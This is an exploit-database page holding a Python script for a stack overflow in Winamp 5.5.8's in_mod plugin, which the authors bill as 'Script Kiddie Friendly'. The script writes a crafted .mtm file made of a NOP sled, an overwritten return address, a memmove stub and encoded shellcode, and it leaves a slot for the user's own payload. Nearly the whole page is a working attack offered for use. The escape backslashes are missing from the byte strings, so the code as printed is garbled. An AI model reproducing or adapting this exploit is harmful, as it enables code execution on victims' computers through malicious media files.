Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (Friendly Version)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (Friendly Version)
# Published : 2010-10-25
# Author : Mighty-D and 7eK
# Previous Title : Linux RDS Protocol Local Privilege Escalation
# Next Title : GSPlayer 1.83a Win32 Release Buffer Overflow Vulnerability
#!/usr/bin/python  
# Pwn And Beans by Mighty-D and 7eK presents:  
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# A Script Kiddie Friendly Production
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet  
# Bug found by http://www.exploit-db.com/exploits/15248/
# An improvement to http://www.exploit-db.com/exploits/15287/
# POC by fdisk
# MemMove Idea from: A.Gomez
# Exploit by Mighty-D and 7eK 
# Special thanks to:  
# fdisk: Who wrote the skeleton of what you are looking at  
# Ryujin: For pointing the bug  
# EDB-Team
# UdeA GITA SSI


import struct

def fill(shellcode):
       nopsFaltantes = ((len(shellcode) / 40)+1)*40 - len(shellcode)
       shellcode += 'x90'*nopsFaltantes
       return shellcode


header = "x4Dx54x4Dx10x63x6Cx69x63x6Bx20x68x65x72x65x20x66x6Fx72x20x69x6Ex66x6Fx21xE0x00x29x39xFFxFFx1Fx00x40x0E"
header += "x78" * 32
buffersize = 65536

nopsled = "x90" * 58200  +"x90"*7
eip = "xEDx1Ex95x7C"

shellcode = "x90x90x90"+"x81xECx19x78xFFxFF" #    REALIGN ESP
#[*] x86/alpha_upper encoder
# Place your shellcode here! 
shellcode += "x89xe2xdbxc3xd9x72xf4x5fx57x59x49x49x49x49" +
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" +
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41" +
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42" +
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx43" +
"x5ax4ax4bx50x4dx4bx58x4cx39x4bx4fx4bx4fx4b" +
"x4fx45x30x4cx4bx42x4cx51x34x47x54x4cx4bx51" +
"x55x47x4cx4cx4bx43x4cx45x55x44x38x43x31x4a" +
"x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx47x50x43" +
"x31x4ax4bx50x49x4cx4bx50x34x4cx4bx43x31x4a" +
"x4ex50x31x4fx30x4cx59x4ex4cx4cx44x49x50x43" +
"x44x45x57x49x51x49x5ax44x4dx45x51x4fx32x4a" +
"x4bx4ax54x47x4bx50x54x46x44x47x58x43x45x4a" +
"x45x4cx4bx51x4fx51x34x43x31x4ax4bx42x46x4c" +
"x4bx44x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4a" +
"x4bx43x33x46x4cx4cx4bx4dx59x42x4cx46x44x45" +
"x4cx45x31x4fx33x50x31x49x4bx45x34x4cx4bx51" +
"x53x46x50x4cx4bx51x50x44x4cx4cx4bx44x30x45" +
"x4cx4ex4dx4cx4bx47x30x43x38x51x4ex42x48x4c" +
"x4ex50x4ex44x4ex4ax4cx50x50x4bx4fx48x56x43" +
"x56x50x53x43x56x43x58x46x53x47x42x45x38x43" +
"x47x43x43x46x52x51x4fx46x34x4bx4fx4ex30x45" +
"x38x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx48" +
"x56x51x4fx4bx39x4dx35x45x36x4bx31x4ax4dx44" +
"x48x44x42x50x55x43x5ax45x52x4bx4fx48x50x42" +
"x48x4ex39x44x49x4bx45x4ex4dx50x57x4bx4fx49" +
"x46x46x33x46x33x46x33x50x53x51x43x51x53x50" +
"x53x51x53x46x33x4bx4fx4ex30x45x36x42x48x44" +
"x51x51x4cx45x36x51x43x4cx49x4dx31x4ax35x42" +
"x48x4fx54x45x4ax44x30x48x47x50x57x4bx4fx49" +
"x46x42x4ax44x50x46x31x50x55x4bx4fx48x50x45" +
"x38x49x34x4ex4dx46x4ex4ax49x46x37x4bx4fx48" +
"x56x51x43x50x55x4bx4fx4ex30x45x38x4dx35x47" +
"x39x4dx56x47x39x50x57x4bx4fx48x56x50x50x50" +
"x54x51x44x51x45x4bx4fx4ex30x4cx53x43x58x4d" +
"x37x42x59x4fx36x42x59x51x47x4bx4fx4ex36x51" +
"x45x4bx4fx48x50x45x36x42x4ax42x44x42x46x42" +
"x48x43x53x42x4dx4bx39x4dx35x43x5ax50x50x51" +
"x49x46x49x48x4cx4cx49x4dx37x43x5ax50x44x4b" +
"x39x4dx32x46x51x4fx30x4ax53x4fx5ax4bx4ex51" +
"x52x46x4dx4bx4ex50x42x46x4cx4cx53x4cx4dx42" +
"x5ax50x38x4ex4bx4ex4bx4ex4bx43x58x42x52x4b" +
"x4ex4fx43x44x56x4bx4fx42x55x47x34x4bx4fx49" +
"x46x51x4bx50x57x50x52x46x31x50x51x50x51x43" +
"x5ax45x51x50x51x46x31x46x35x50x51x4bx4fx48" +
"x50x42x48x4ex4dx48x59x44x45x48x4ex50x53x4b" +
"x4fx49x46x43x5ax4bx4fx4bx4fx46x57x4bx4fx48" +
"x50x4cx4bx50x57x4bx4cx4dx53x4fx34x45x34x4b" +
"x4fx49x46x46x32x4bx4fx4ex30x42x48x4ax50x4c" +
"x4ax45x54x51x4fx50x53x4bx4fx48x56x4bx4fx48" +
"x50x41x41"

shellcode = fill(shellcode)
nroChunks = (len(shellcode) / 40)

strNroChunks = struct.pack("B", nroChunks+13) #El shellcode del mmove resta 13
print ( "nroChunks=0x%X, strNroChunks=0x%X" % (nroChunks,
struct.unpack("B", strNroChunks)[0] ) )

#add strNroChunks
mmove ="x90x90x90x90x90x90x90x90x90x90x90x90x90x89xe3x81xebxccxfexffxffxffxe3x60x89xfdx8bx45x3cxf7xd8x29xc5x8bx7dx78xf7xd8x29xc5xf7xddx29xefx8bx4fx18x50x90x90x90x90x90x58x8bx5fx20x29xebxf7xddx85xc9x75x0dxffx61xc3x90x90x90x90x90x90x90x90x90x90x90x49x8bx34x8bxf7xddx29xeexf7xddx31xc0x99xfcxacx84xc0x74x20xc1xcax0dxffxf7xd8x29xc2xf7xd8xebxeex90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x3bx54x24x28x75xb2x8bx5fx24x50x90x90x90x90x58xf7xddx29xebx50x53xf7xd9x29xcbx29xcbx31xc0xb0x20x29xc3xf7xd9x66x8bx4bx20x5bx58x4fx4fx4fx4fx8bx5fx20x47x50x90x90x90x58x47x47x47x29xebx53x52x31xd2xb2x20xf7xd9x29xcbx29xcbx29xcbx29xcbx29xd3x8bx43x20xf7xd9x5ax5bx29xe8xf7xddx4cx50x90x90x90x58x4cx4cx4cx89x44x24x20x44x44x44x44x61xc3x90x90x31xdbxb3x80x29xdcx5bx89xe5x31xc0x64x8bx40x30x48x8bx40x0dxffx48x48x48x48x8bx70x20xadx2cx20x8bx78x28x2cx20x89x7dx60x4cx4cx4cx4cx4cx4cx4cx4cx52x44x44x44x44x44x44x44x44x50x90x90x90x90x90x90x58xbax6cx2cxecxc9xf7xdax81xeax22x22x22x22xf7xdax52x4cx4cx4cx4cx5ax57xe8xc0xfexffxffx53x89xebx80xebx20x50x90x90x90x90x90x58x89x43x20x5bx31xc0x2cx80x2cx70x29xc5x31xc0x50x68x6cx20x20x20x68x6cx2ex64x6cx68x6ex74x64x6cx54x89xe8x2cx90x50x90x90x90x58x2cx80x8bx40x20xffxd0x89xc7x68x58xecx6ax5fx57xe8x73xfexffxffx90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x50x90x90x90x58x89xe5x31xd2x66x81xeax9cxfcx90x90x90x90x90x66xf7xdax66x29xd5x31xd2x66xbax77x27x29xd4x89xe7x54x31xc9xb1"+strNroChunks+"x50x90x90x90x90x58xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9x50x31xc0xb0x28xfexc0x50x90x90x90x90x58xfexc0x31xd2xb2"+strNroChunks+"xfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcax29xcax50x90x90x90x90x90x90x58xf6xe2x89xc6x58xf7xddx29xeexf7xddx50x51x31xdbxb3x28x53x56x57xffxd0x66x81xecxf4xffx59x58x31xdbxb3x28x50x90x90x90x90x58xf7xdbx29xdfx31xdbxfexcbx29xdexe2x90x5fxffxd7" + "x90"*20

nops = "x90"*70

payload = header + nopsled + eip + nops + mmove + shellcode;

file = open("crash.mtm", "w")
file.write(payload)
file.close()

print "mtm file generated successfuly"